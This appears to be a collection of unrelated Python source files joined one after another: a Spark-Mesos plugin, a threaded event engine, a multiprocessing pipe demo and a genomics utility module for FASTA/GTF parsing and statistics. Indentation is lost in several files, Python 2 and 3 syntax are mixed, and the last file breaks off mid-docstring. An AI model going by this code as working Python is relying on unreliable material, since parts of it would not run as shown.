class SparkMesosProvider(base.PluginInterface):
def __init__(self):
self.running_application = SparkMesosApplicationExecutor(None, None)
def get_title(self):
return 'Spark-Mesos on Open Nebula plugin for BigSea framework'
def get_description(self):
return 'It runs an spark application on a Mesos cluster'
def to_dict(self):
return {
'name': self.name,
'title': self.get_title(),
'description': self.get_description(),
}
def busy(self):
application_state = self.running_application.get_application_state()
if application_state == "Running":
return True
else:
return False
def execute(self, data):
if not self.busy():
frameworks_url = "%s:%s" % (api.mesos_url,
api.mesos_port)
app_id = "app-spark-mesos-" + str(uuid4())[:8]
executor = SparkMesosApplicationExecutor(app_id, frameworks_url)
handling_thread = threading.Thread(
target=executor.start_application, args=(data,)
)
handling_thread.start()
else:
plugin_log.log("%s | Cluster busy" % (time.strftime("%H:%M:%S")))
return ("", None)
self.running_application = executor
return (app_id, executor)
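# Hedged usage sketch (assumption, not shipped with the plugin): the minimal data
# payload that SparkMesosProvider.execute() expects, based on the keys read in
# start_application(). The URL, class name and numbers are placeholders.
def _submit_example():
    provider = SparkMesosProvider()
    data = {
        'app_name': 'bulma',                        # optimizer-aware application name
        'days': 2,                                  # only required when app_name is 'bulma'
        'binary_url': 'http://example.com/job.jar',
        'execution_class': 'org.example.Main',      # empty string means a Python binary
        'execution_parameters': 'arg1 arg2',
        'expected_time': 600,
        'number_of_jobs': 4,
        'starting_cap': 50,
    }
    app_id, executor = provider.execute(data)
    return app_id, executor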
|
event_engine.py
|
# encoding: UTF-8
# Standard library modules
try:
    from queue import Queue, Empty      # Python 3
except ImportError:
    from Queue import Queue, Empty      # Python 2
from threading import Thread
from time import sleep
from collections import defaultdict
EVENT_TIMER = 'eTimer'    # timer event, emitted once per second by default
class EventEngine(object):
    """
    Event-driven engine whose timer runs on a Python thread
    """
    def __init__(self):
        """Initialize the event engine"""
        # event queue
        self.__queue = Queue()
        # engine on/off switch
        self.__active = False
        # event-processing thread
        self.__thread = Thread(target=self.__run)
        # timer thread used to emit timer events
        self.__timer = Thread(target=self.__runTimer)
        self.__timerActive = False    # timer running state
        self.__timerSleep = 1         # timer interval (1 second by default)
        # __handlers maps each event type to the list of handler
        # functions listening for that event type
        self.__handlers = defaultdict(list)
    def __run(self):
        """Run the engine loop"""
        while self.__active:
            try:
                event = self.__queue.get(block=True, timeout=1)  # block for at most 1 second waiting for an event
                self.__process(event)
            except Empty:
                pass
    def __process(self, event):
        """Process a single event"""
        # check whether any handler is listening for this event type
        if event.type_ in self.__handlers:
            # if so, pass the event to each handler in registration order
            [handler(event) for handler in self.__handlers[event.type_]]
            # the list comprehension above is equivalent to the loop:
            # for handler in self.__handlers[event.type_]:
            #     handler(event)
    def __runTimer(self):
        """Loop that runs in the timer thread"""
        while self.__timerActive:
            # create a timer event
            event = Event(type_=EVENT_TIMER)
            # push the timer event onto the queue
            self.put(event)
            # wait for the next tick
            sleep(self.__timerSleep)
    def start(self):
        """Start the engine"""
        # mark the engine as active
        self.__active = True
        # start the event-processing thread
        self.__thread.start()
        # start the timer; the timer event interval defaults to 1 second
        self.__timerActive = True
        self.__timer.start()
    def stop(self):
        """Stop the engine"""
        # mark the engine as inactive
        self.__active = False
        # stop the timer
        self.__timerActive = False
        self.__timer.join()
        # wait for the event-processing thread to exit
        self.__thread.join()
    def register(self, type_, handler):
        """Register a handler to listen for an event type"""
        # fetch the handler list for this event type; defaultdict creates a new list if absent
        handlerList = self.__handlers[type_]
        # only register the handler if it is not already listening for this event
        if handler not in handlerList:
            handlerList.append(handler)
    def unregister(self, type_, handler):
        """Unregister a handler for an event type"""
        # fetch the handler list for this event type; unknown types are effectively ignored
        handlerList = self.__handlers[type_]
        # remove the handler if it is present in the list
        if handler in handlerList:
            handlerList.remove(handler)
        # if the handler list is now empty, drop the event type from the engine
        if not handlerList:
            del self.__handlers[type_]
    def put(self, event):
        """Put an event onto the event queue"""
        self.__queue.put(event)
class Event:
    """Event object"""
    def __init__(self, type_=None):
        """Constructor"""
        self.type_ = type_    # event type
        self.dict_ = {}       # dictionary holding the event payload
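# Hedged usage sketch (assumption, not part of the original module): registering a
# handler for a custom event type and pushing one event through the engine.
def _custom_event_example():
    engine = EventEngine()
    def on_tick(event):
        print(u'tick payload: {0}'.format(event.dict_.get('price')))
    engine.register('eCustomTick', on_tick)
    engine.start()
    tick = Event(type_='eCustomTick')
    tick.dict_['price'] = 42.0
    engine.put(tick)
    sleep(2)      # give the worker thread time to process the event
    engine.stop()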
def test():
    """Test function"""
    import tushare
    def simpletest(event):
        info = tushare.get_realtime_quotes('000333')
        print(u'Current Midea Group quote: {0}'.format(info))
    ee = EventEngine()
    ee.register(EVENT_TIMER, simpletest)
    ee.start()
# run this script directly to execute the test
if __name__ == '__main__':
    test()
|
pipes.py
|
"""
"멀티프로세싱"절 예시
`multiprocessing` 모듈의 파이프를
커뮤니케이션 채널로 이용하는 방법을 설명한다.
"""
from multiprocessing import Process, Pipe
class CustomClass:
pass
def worker(connection):
while True:
instance = connection.recv()
if instance:
print(f"CHLD: recv: {instance}")
if instance is None:
break
def main():
parent_conn, child_conn = Pipe()
child = Process(target=worker, args=(child_conn,))
for item in (
42,
"some string",
{"one": 1},
CustomClass(),
None,
):
print("PRNT: send: {}".format(item))
parent_conn.send(item)
child.start()
child.join()
if __name__ == "__main__":
main()
|
ribo_utils.py
|
import os
import operator
import itertools
import gzip
import numpy as np
from scipy import stats
import dill as pickle
import math
import multiprocessing
from collections import defaultdict
'''
Colorblind safe colors from Bang Wong, Nature Methods 8. 441 (2011)
'''
black = (0,0,0)
orange = (230/255.0,159/255.0,0)
skyBlue = (86/255.0,180/255.0,233/255.0)
bluishGreen = (0,158/255.0,115/255.0)
yellow = (240/255.0,228/255.0,66/255.0)
blue = (0,114/255.0,178/255.0)
vermillion = (213/255.0,94/255.0,0)
reddishPurple = (204/255.0,121/255.0,167/255.0)
colors = [black, orange, skyBlue, bluishGreen, vermillion, blue, reddishPurple, yellow]
rainbow = [black, vermillion, orange, bluishGreen, blue, reddishPurple, 'violet']
markers = ['.', 'o', 'v', 's', '^', 'p', 'x', '+']
line_styles = ['solid', 'dashed', 'dotted']
bokeh_black = (0,0,0)
bokeh_orange = (230,159,0)
bokeh_skyBlue = (86,180,233)
bokeh_bluishGreen = (0,158,115)
bokeh_yellow = (240,228,66)
bokeh_blue = (0,114,178)
bokeh_vermillion = (213,94,0)
bokeh_reddishPurple = (204,121,167)
###############################
#Parralellization code from
# http://stackoverflow.com/questions/3288595/multiprocessing-using-pool-map-on-a-function-defined-in-a-class
###############################
def spawn(f):
def fun(q_in,q_out):
while True:
i,x = q_in.get()
if i == None:
break
q_out.put((i,f(x)))
return fun
def parmap(f, X, nprocs = multiprocessing.cpu_count()):
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=spawn(f),args=(q_in,q_out)) for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i,x)) for i,x in enumerate(X)]
[q_in.put((None,None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i,x in sorted(res)]
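# Hedged usage sketch (assumption): parmap applies a function over an iterable in
# parallel worker processes and returns the results in input order. It relies on
# fork-style multiprocessing, as the original recipe does.
def _parmap_example():
    # expected result: [0, 1, 4, 9, 16, 25, 36, 49]
    return parmap(lambda x: x * x, range(8), nprocs=4)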
##########
#FILE HANDLING
##########
def unPickle(fileName):
    # returns the pickled object stored in a pickle file
    f = open(fileName, 'rb')    # pickles are binary data; open in binary mode
    o = pickle.load(f)
    f.close()
    return o
def makePickle(o, fileName, protocol=pickle.HIGHEST_PROTOCOL):
    f = open(fileName, 'wb')
    pickle.dump(o, f, protocol=protocol)
    f.close()
def make_dir(dirname):
    """
    Makes the directory; doesn't throw an error if it exists.
    """
    if not os.path.exists(dirname):
        try:
            os.makedirs(dirname)
        except OSError:
            # another process or thread created the directory between the check and the call
            print('The directory was made by another thread extremely recently.')
def file_exists(fname):
"""
makes sure a given file exists
"""
if not os.path.exists(fname):
return False
fstats = os.stat(fname)
if not fstats[6]:
return False
if not os.access(fname, os.R_OK):
raise ValueError('Input File %s cannot be read' % fname)
return True
def file_len(fname):
    if fname.endswith('.gz'):
        f = gzip.open(fname)
    else:
        f = open(fname)
    i = -1    # so that an empty file reports 0 lines
    for i, l in enumerate(f):
        pass
    f.close()
    return i + 1
def tsv_to_dict(filename, header=True, delimiter='\t', key_column=0, convert_to_float=False):
    """
    Returns a dict indexed first by the row labels, then by the column headers
    """
    return_dict = {}
    f = open(filename)
    lines = f.readlines()
    headers = lines[0].strip('\n').split(delimiter)
    for line in lines[1:]:
        ll = line.strip('\n').split(delimiter)
        return_dict[ll[key_column]] = {}
        for i in range(0, len(ll)):
            if not i == key_column:
                if not convert_to_float:
                    return_dict[ll[key_column]][headers[i]] = ll[i]
                else:
                    # values read from the file are strings; convert explicitly
                    return_dict[ll[key_column]][headers[i]] = float(ll[i])
    f.close()
    return return_dict
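# Hedged usage sketch (assumption; 'counts.tsv', 'geneA' and 'sample1' are made-up
# names): tsv_to_dict returns {row_label: {column_header: value}} for a
# tab-delimited file whose first column holds the row labels.
def _tsv_to_dict_example():
    table = tsv_to_dict('counts.tsv', convert_to_float=True)
    return table['geneA']['sample1']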
##########
#MATH
##########
def divideWithError(num, stdDevNum, denom, stdDevDenom):
'''
    divides the two values with the provided standard deviations, and returns the ratio and its error using standard error propagation
'''
num = float(num)
denom = float(denom)
stdDevNum = float(stdDevNum)
stdDevDenom = float(stdDevDenom)
ratio = num/denom
ratioError = ratio*math.sqrt((stdDevNum/num)**2+(stdDevDenom/denom)**2)
return ratio, ratioError
def subtractWithError(num, stdDevNum, denom, stdDevDenom):
    '''
    subtracts the second value from the first, with the provided standard deviations,
    and returns the difference and its error using standard error propagation
    '''
    num = float(num)
    denom = float(denom)
    stdDevNum = float(stdDevNum)
    stdDevDenom = float(stdDevDenom)
    difference = num - denom
    # for a difference, the absolute errors add in quadrature
    differenceError = math.sqrt(stdDevNum**2 + stdDevDenom**2)
    return difference, differenceError
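# Hedged worked example (assumption): standard error propagation. For the ratio
# 10.0 +/- 1.0 over 5.0 +/- 0.5 the result is 2.0 with an error of
# 2.0 * sqrt((1.0/10.0)**2 + (0.5/5.0)**2) ~= 0.283; the difference is 5.0 with an
# error of sqrt(1.0**2 + 0.5**2) ~= 1.118.
def _error_propagation_example():
    ratio, ratio_err = divideWithError(10.0, 1.0, 5.0, 0.5)
    diff, diff_err = subtractWithError(10.0, 1.0, 5.0, 0.5)
    return ratio, ratio_err, diff, diff_err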
def next_square_number(number):
return int(math.ceil(math.sqrt(number)))**2
def computePfromMeanAndStDevZscore(mean, standard_deviation, testValue):
#computes probability that test value came from a gaussian with the given mean and standard deviation
try:
z = (float(testValue)-mean)/standard_deviation
p = stats.norm.sf(z)
return p, z
except ZeroDivisionError:
return 0.5, 0
def ranges_overlap(min1, max1, min2, max2):
"""
:param min1:
:param max1:
:param min2:
:param max2:
:return: return True if the 2 ranges overlap (edge inclusive), else False
"""
if min1 <= max2 and min2 <= max1:
return True
return False
def number_passing_cutoff(numbers, cutoff):
i = 0
for number in numbers:
if number >= cutoff:
i += 1
return i
def significantly_enriched(xs, zthresh=2., scale='linear'):
assert scale in ['linear', 'log']
if scale =='log':
xs = np.log2(xs)
xs = stats.zscore(xs)
return [x > zthresh for x in xs]
def filter_x_y_pairs(x, y, filter_list = [float('inf'), -1*float('inf')]):
'''
takes 2 paired arrays, and returns matched copies of them with any positions with values in
filter_list removed from both arrays, to keep them synced.
    also removes NaN (detected by testing whether the entry equals itself, which fails for NaN)
:param filter_list: list of values to remove
:return:
'''
filtered_x, filtered_y = [], []
assert len(x) == len(y)
for i in range(len(x)):
if x[i] not in filter_list and y[i] not in filter_list and x[i]==x[i] and y[i]==y[i]:
filtered_x.append(x[i])
filtered_y.append(y[i])
return np.array(filtered_x), np.array(filtered_y)
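# Hedged usage sketch (assumption): dropping inf and NaN entries from a pair of
# measurement arrays while keeping the two arrays aligned.
def _filter_pairs_example():
    x = [1.0, float('inf'), 2.0, float('nan')]
    y = [5.0, 6.0, 7.0, 8.0]
    fx, fy = filter_x_y_pairs(x, y)
    return fx, fy    # array([1., 2.]), array([5., 7.])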
def benjaminiHochbergCorrection(pValDict):
'''
takes a dictionary mapping key to p value
returns a dictionary of Benjamini-Hochberg corrected Q values
Q = p * n / k, where n is the # of observations, and k is the rank of the particular p-value among all p-values
'''
qValues = {}
sorted_p = sorted(pValDict.iteritems(), key=operator.itemgetter(1))
n = len(sorted_p)
for i in range(n):
k = i+1
q = sorted_p[i][1] * n / k
qValues[sorted_p[i][0]] = q
return qValues
def bonferroniCorrection(pValDict):
'''
takes a dictionary mapping key to p value
returns a dictionary of Bonferroni corrected Q values
Q = p * n, where n is the # of observations
'''
qValues = {}
sorted_p = sorted(pValDict.iteritems(), key=operator.itemgetter(1))
n = len(sorted_p)
for i in range(n):
q = sorted_p[i][1] * n
qValues[sorted_p[i][0]] = q
return qValues
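# Hedged usage sketch (assumption): applying both corrections to a toy set of
# p-values keyed by gene name.
def _multiple_testing_example():
    p_values = {'geneA': 0.001, 'geneB': 0.02, 'geneC': 0.04}
    bh_q = benjaminiHochbergCorrection(p_values)    # rank-scaled: p * n / k
    bonferroni_q = bonferroniCorrection(p_values)   # p * n
    return bh_q, bonferroni_q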
##################
#SEQUENCE HANDLING
##################
GENETIC_CODE = {
'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',
'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',
'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',
'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',
'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',
'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',
'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',
'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',
'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',
'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',
'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',
'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',
'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',
'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',
'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',
'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W',
}
def rna(dna_seq):
return dna_seq.replace('T','U').replace('t', 'u')
def get_barcode(line):
"""
- Extracts the barcode from the first line of a fastq quartet
- Assumes the first line is of the form:
@D5FF8JN1:4:1101:1220:2099#ACTTGA/1
"""
return line.split('#')[-1].split('/')[0]
def convertFastaToDict(fastaFile):
'''
converts a fasta file to a dict of {sequenceName:sequence}
can take extra files in * args
'''
if isinstance(fastaFile, list):
files = fastaFile
else:
files = [fastaFile]
currentName = None
currentSequence = None
seqDict = {}
for currentFile in files:
if currentFile.endswith('.gz'):
f = gzip.open(currentFile)
else:
f = open(currentFile)
for line in f:
if not line.strip() == '' and not line.startswith('#'): # ignore empty lines and commented out lines
if line.startswith('>'): # > marks the start of a new sequence
                    if currentName is not None: # after we've reached the first > line, we know what the sequence corresponds to
                        seqDict[currentName] = currentSequence
                    # gencode names have extraneous numbering after some whitespace that doesn't match the GTF files, so remove it
                    currentName = line.strip()[1:].split()[0]
currentSequence = ''
else:
currentSequence += line.strip()
f.close()
seqDict[currentName] = currentSequence
return seqDict
def hamming_N(str1, str2):
    if not len(str1) == len(str2):
        raise ValueError("lengths don't match")
str1 = str1.upper()
str2 = str2.upper()
str1 = str1.replace('N', '#')
return sum(itertools.imap(operator.ne, str1, str2))
# from http://code.activestate.com/recipes/499304-hamming-distance/
def hamming_distance(str1, str2):
assert len(str1) == len(str2)
ne = operator.ne
return sum(itertools.imap(ne, str1, str2))
def reverse_complement(seq, isRNA = False):
seq = seq.upper()
compDict = {'A':'T', 'T':'A', 'U':'A', 'C':'G', 'G':'C', 'N':'N', '-':'-', '.':'.', '*':'*'}
revComp = ''.join([compDict[c] for c in seq[::-1]])
if isRNA:
return revComp.replace('T', 'U')
return revComp
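# Hedged helper sketch (assumption, not in the original module): translating a DNA
# coding sequence with the GENETIC_CODE table defined above. A stop codon ('_')
# terminates translation and any incomplete trailing codon is ignored.
def translate_cds_example(cds_seq):
    protein = []
    cds_seq = cds_seq.upper()
    for i in range(0, len(cds_seq) - 2, 3):
        aa = GENETIC_CODE.get(cds_seq[i:i + 3], 'X')   # 'X' marks ambiguous codons
        if aa == '_':
            break
        protein.append(aa)
    return ''.join(protein)
# translate_cds_example('ATGGTTTAA') returns 'MV'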
def close_float_value(a, b, max_percent=1.0):
if a == 0 and b == 0:
return True
if not (a > 0 and b > 0):
return False
ratio = float(max(a, b)) / float(min(a, b))
percent_increase = (ratio - 1.0) * 100.0
return percent_increase < max_percent
def getAllMismatchedSeqs(kmer, mismatchPositions):
nucs = ['A', 'C', 'G', 'T']
#generate tuples of allowed nucs at each mismatch position using a recursive algorithm
allowedNucs = {}
mismatchPositions = np.array(mismatchPositions)
assert len(set(mismatchPositions)) == len(mismatchPositions)
if len(mismatchPositions) == 0:
yield kmer
else:
mismatchNucs = [] + nucs
#print kmer
#print mismatchPositions
#print mismatchPositions[0]
#print kmer[mismatchPositions[0]]
mismatchNucs.remove(kmer[mismatchPositions[0]])
        # materialize the recursive generator so it can be re-used for every mismatchNuc
        downstreamMismatchSeqs = list(getAllMismatchedSeqs(kmer[mismatchPositions[0]+1:], mismatchPositions[1:]-(mismatchPositions[0]+1)))
for mismatchNuc in mismatchNucs:
for downstreamMismatchSeq in downstreamMismatchSeqs:
returnSeq = kmer[:mismatchPositions[0]] + mismatchNuc +downstreamMismatchSeq
assert len(returnSeq) == len(kmer)
yield returnSeq
def getPaddedMismatchedAdjacentKmers(kmerSequence, padding, numMismatches):
'''
Yield all sequences of length (len(kmerSequence)+padding )that contain the given kmer, with exactly the given number of mismatches.
The order yielded is as follows:
First mismatches are allowed at position 0 to (numMismatches-1)
For each register:
Iterate through all possible nucs at mismatch position in alphabetical order
Iterate through each nucleotide in padding positions in alphabetical order.
Shift to next register
Move most 3' mismatch position down by one, but not past the end of the kmerSequence if end of KmerSequence
is reached, shift secondmost 3' mismatch 1 nt 3', and reset most 3' mismatch to 1nt 3' of that one
'''
# for troubleshooting, want to check that no repeats are generated, so will assert that size of this list and set
# must be the same
kmer_set = set()
kmer_list =[]
upper_to_combined = {}
nucs = 'ACGT'
#initialize mismatchPositions
#print numMismatches
if numMismatches == 0:
for mismatchedKmer in [kmerSequence]:
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
if paddedSeq not in kmer_set:
kmer_list.append(paddedSeq)
kmer_set.add(paddedSeq)
else:
mismatchPositionsList = itertools.combinations(range(len(kmerSequence)), numMismatches)
for mismatchPositions in mismatchPositionsList:
#print mismatchPositions
for mismatchedKmer in getAllMismatchedSeqs(kmerSequence, mismatchPositions):
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
paddedUpper = paddedSeq.upper()
if paddedUpper not in kmer_set:
kmer_list.append(paddedUpper)
kmer_set.add(paddedUpper)
#print kmer_list
#print kmer_set
#print len(kmer_list), len(kmer_set)
#assert len(kmer_list) == len(kmer_set)
return kmer_list
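# Hedged usage sketch (assumption): enumerating every 6-mer that contains the
# 4-mer 'ACGT' with exactly one mismatch, padded out to length 6 (padding=2).
def _padded_kmer_example():
    kmers = getPaddedMismatchedAdjacentKmers('ACGT', 2, 1)
    return len(kmers), kmers[:5]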
##################
#GTF file parsing and handling
##################
class genome_sequence():
def __init__(self, fasta_file, *args):
self.genome_sequence = convertFastaToDict(fasta_file, *args)
def get_sequence(self, chromosome, start, end, strand):
"""
returns a string of genome sequence at the given start and end positions, inclusive
reverse-complemented for minus strand
start and end are 1-indexed (first base-pair of genome is 1)
"""
assert end >= start
sequence = self.genome_sequence[chromosome][start - 1: end]
if strand == '-':
return reverse_complement(sequence)
else:
return sequence
class gtf_data():
def __init__(self, gtf_file, add_3_for_stop = False):
self.gtf_entries = []
        # sometimes stop codons are not included in the "CDS" annotation in GTF files and are instead under their own
        # 3 nt entries. To deal with this situation, add_3_for_stop should be set to True
        self.add_3_for_stop = add_3_for_stop
        self.fields = ['chr', 'source', 'type', 'start', 'end', 'score', 'strand', 'frame', 'additional']
        # note: levels 1 and 2 are verified and manually annotated, respectively; level 3 is automatically annotated
#self.additional_mandatory_keys = ['gene_id', 'transcript_id', 'gene_type', 'gene_status', 'gene_name',
# 'transcript_type', 'transcript_status', 'transcript_name', 'exon_number',
# 'exon_id', 'level']
self.transcript_to_entries = defaultdict(set)
self.gene_to_entries = defaultdict(set)
self.genes_to_tx = defaultdict(set)
self.tx_to_genes = {} #tx id to gene id
self.tx_to_gene_names = {} #tx id to common gene name
self.tx_to_strand = {}
self.tx_to_chr = {}
#self.feature_type_summary = defaultdict(int)
#self.transcript_type_summary = defaultdict(int)
# for each location a read maps, will keep the entry for the shortest feature found there and it's type
self.shortest_annotations = {'+':defaultdict(lambda : defaultdict(dict)),
'-':defaultdict(lambda : defaultdict(dict))}
# a dict of {chromosome: {strand: {start and/or endposition, rounded DOWN to the nearest thousand: [entries overlapping this range, sorted, first by start position, then by length}}
# Each unit of 1000 (a mille) can also potentially share entries with the neighboring ones
# So shorter entries will precede longer ones.
#I'm using integer division to do the rounding
self.chr_to_entry = None
self.add_gtf_data(gtf_file)
def add_gtf_data(self, gtf_file):
if gtf_file.endswith('.gz'):
gtf = gzip.open(gtf_file)
else:
gtf = open(gtf_file)
for line in gtf:
if not line.startswith('#'):
new_entry = gtf_entry(line, self)
self.gtf_entries.append(new_entry)
#self.feature_type_summary[new_entry.get_value('type')] += 1
#self.transcript_type_summary[new_entry.get_value('transcript_type')] += 1
gene_id = new_entry.get_value('gene_id')
transcript_id = new_entry.get_value('transcript_id')
gene_name = new_entry.get_value('gene_name')
self.tx_to_genes[transcript_id] = gene_id
self.tx_to_gene_names[transcript_id] = gene_name
strand = new_entry.get_value('strand')
self.tx_to_strand[transcript_id] = strand
chromosome = new_entry.get_value('chr')
self.tx_to_chr[transcript_id] = chromosome
if gene_id != None:
self.gene_to_entries[gene_id].add(new_entry)
if transcript_id != None:
self.transcript_to_entries[transcript_id].add(new_entry)
self.genes_to_tx[gene_id].add(transcript_id)
#self.gtf_entries.sort(key=lambda x: (x.get_value('chr'), int(x.get_value('start')), int(x.get_value('end'))))
gtf.close()
def bin_entries_on_chromosome(self, bin_size=1000):
self.chr_to_entry = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
for entry in self.gtf_entries:
            for position_bin in range(int(entry.get_value('start')) // bin_size * bin_size,
                                      (int(entry.get_value('end')) // bin_size * bin_size) + bin_size, bin_size):
self.chr_to_entry[entry.get_value('chr')][entry.get_value('strand')][position_bin].append(entry)
assert len(self.chr_to_entry[entry.get_value('chr')][entry.get_value('strand')][position_bin]) == len(
set(self.chr_to_entry[entry.get_value('chr')][entry.get_value('strand')][position_bin]))
for chromosome in self.chr_to_entry:
for strand in self.chr_to_entry[chromosome]:
for position_bin in self.chr_to_entry[chromosome][strand]:
self.chr_to_entry[chromosome][strand][position_bin].sort(key=lambda x: (int(x.get_value('start')), int(x.get_value('end'))))
def print_transcript_multiplicity(self, gene_type=None):
self.tx_counts_histogram = defaultdict(int)
for gene_id in self.genes_to_tx:
if gene_type == None or gene_type == sorted(self.gene_to_entries[gene_id])[0].get_value('gene_type'):
self.tx_counts_histogram[len(self.genes_to_tx[gene_id])] += 1
for count in sorted(self.tx_counts_histogram.keys()):
print count, self.tx_counts_histogram[count]
def tx_with_longest_CDS(self, gene_id, starting_subset=None):
"""
starting_subset can be a list of transcript ids. If it is given, then only those transcripts will be considered
"""
if starting_subset == None:
transcripts = self.genes_to_tx[gene_id]
else:
transcripts = starting_subset
if len(transcripts) == 1:
return [sorted(transcripts)[0]]
else:
if self.add_3_for_stop:
sorted_transcripts = sorted(transcripts,
key=lambda x: int(self.spliced_length(x, exon_type=['CDS', 'stop_codon'])),
reverse=True)
longest_CDS_length = self.spliced_length(sorted_transcripts[0], exon_type=['CDS', 'stop_codon'])
return [x for x in sorted_transcripts if
self.spliced_length(x, exon_type=['CDS', 'stop_codon']) == longest_CDS_length]
else:
sorted_transcripts = sorted(transcripts,
key=lambda x: int(self.spliced_length(x, exon_type=['CDS'])),
reverse=True)
longest_CDS_length = self.spliced_length(sorted_transcripts[0], exon_type=['CDS'])
return [x for x in sorted_transcripts if
self.spliced_length(x, exon_type=['CDS']) == longest_CDS_length]
def longest_tx(self, gene_id, starting_subset=None):
if starting_subset == None:
transcripts = self.genes_to_tx[gene_id]
else:
transcripts = starting_subset
if len(transcripts) == 1:
return [sorted(transcripts)[0]]
else:
sorted_transcripts = sorted(transcripts, key=lambda x: int(self.spliced_length(x, exon_type='exon')),
reverse=True)
longest_tx_length = self.spliced_length(sorted_transcripts[0], exon_type='exon')
return [x for x in sorted_transcripts if self.spliced_length(x, exon_type='exon') == longest_tx_length]
def pick_all_longest_CDS_transcripts(self):
# picks transcripts with longest CDS
# If tied picks longest TX
# Otherwise, pick the first one randomly and make note
genes_with_ties = []
chosen_tx = []
for gene_id in self.genes_to_tx:
tx_with_longest_CDS = self.tx_with_longest_CDS(gene_id)
assert len(tx_with_longest_CDS) > 0
if len(tx_with_longest_CDS) == 1:
chosen_tx.append(tx_with_longest_CDS[0])
else:
tx_with_longest_tx = self.longest_tx(gene_id, starting_subset=tx_with_longest_CDS)
assert len(tx_with_longest_tx) > 0
if len(tx_with_longest_tx) == 1:
chosen_tx.append(tx_with_longest_tx[0])
else:
genes_with_ties.append(gene_id)
chosen_tx.append(tx_with_longest_tx[0])
assert len(chosen_tx) == len(set(chosen_tx))
return chosen_tx
def filter_transcripts_by_value(self, key, allowed_values, starting_subset=None):
# returns all entries for which the given key matches one of the allowed values
chosen_tx = []
if starting_subset == None:
starting_subset = self.transcript_to_entries.keys()
for transcript_id in starting_subset:
if sorted(self.transcript_to_entries[transcript_id])[0].get_value(key) in allowed_values:
chosen_tx.append(transcript_id)
assert len(chosen_tx) == len(set(chosen_tx))
return chosen_tx
def find_annotations_overlapping_range(self, chromosome, strand, start_position, end_position, type_restrictions=None,
type_sorting_order=['CDS', 'UTR', 'start_codon', 'stop_codon', 'Selenocysteine', 'tRNA', 'exon', 'transcript', 'gene'], bin_size=1000):
"""
:param chromosome:
:param strand:
:param start_position:
:param end_position:
:param type_restrictions:
:return: list of entries (shortest first) that overlap the given range in any way. Partially or completely.
"""
if self.chr_to_entry is None:
self.bin_entries_on_chromosome(bin_size=bin_size)
overlaps = []
        for position_bin in range(int(start_position) // bin_size * bin_size, (int(end_position) // bin_size * bin_size) + bin_size, bin_size):
for entry in self.chr_to_entry[chromosome][strand][position_bin]:
if type_restrictions != None and entry.get_value('type') not in type_restrictions:
continue
#The general overlap criterion
elif start_position <= int(entry.get_value('end')) and end_position >= int(entry.get_value('start')):
overlaps.append(entry)
elif int(entry.get_value('start')) > end_position:
overlaps.sort(key=lambda x: (type_sorting_order.index(x.get_value('type')), x.length()))
return overlaps
overlaps.sort(key=lambda x: (type_sorting_order.index(x.get_value('type')), x.length()))
return overlaps
def find_smallest_annotation_at_position(self, chromosome, strand, start_position, end_position, type_restrictions=None,
type_sorting_order=['CDS', 'UTR', 'start_codon', 'stop_codon', 'Selenocysteine', 'tRNA', 'exon', 'transcript', 'gene']):
'''
Finds the smallest (smallest end-start) entry at a given position
:param chr:
:param position:
:return:
'''
#if not (start_position in self.shortest_annotations[strand][chr] and end_position in self.shortest_annotations[strand][chr][start_position]):
entries = self.find_annotations_overlapping_range(chromosome, strand, start_position, end_position, type_restrictions=type_restrictions, type_sorting_order=type_sorting_order, bin_size=1000)
if len(entries)>0:
#self.shortest_annotations[strand][chr][start_position][end_position] = entries[0]
return entries[0]
else:
#self.shortest_annotations[strand][chr][start_position][end_position] = None
return None
#return self.shortest_annotations[strand][chr][start_position][end_position]
def utr_type(self, entry):
"""
if the type of the given entry is "UTR", returns '5p_UTR' or '3p_UTR' as appropriate
:param entry:
:return:
"""
if not entry.is_type('UTR'):
return None
else:
transcript_id = entry.get_value('transcript_id')
cds_exons = self.sorted_exons(transcript_id, exon_type='CDS')
if entry.get_value('strand') == '+' and int(entry.get_value('end')) < int(cds_exons[0].get_value('start')):
return '5p_UTR'
elif entry.get_value('strand') == '-' and int(entry.get_value('start')) > int(cds_exons[0].get_value('end')):
return '5p_UTR'
else:
return '3p_UTR'
###############
# Methods for getting transcript information
###############
def spliced_length(self, transcript_id, exon_type='exon'):
"""
exon_type can be CDS or exon.
        CDS will start and end at CDS boundaries, so that's convenient
        Returns the length of the transcript or CDS
"""
ordered_exon_entries = self.sorted_exons(transcript_id, exon_type=exon_type)
if len(ordered_exon_entries) == 0:
return 0
transcript_length = sum([exon_entry.length() for exon_entry in ordered_exon_entries])
return transcript_length
def sorted_exons(self, transcript_id, exon_type='exon'):
"""
        exon_type can be: CDS, exon, UTR, stop_codon, start_codon, or a list containing a combination thereof.
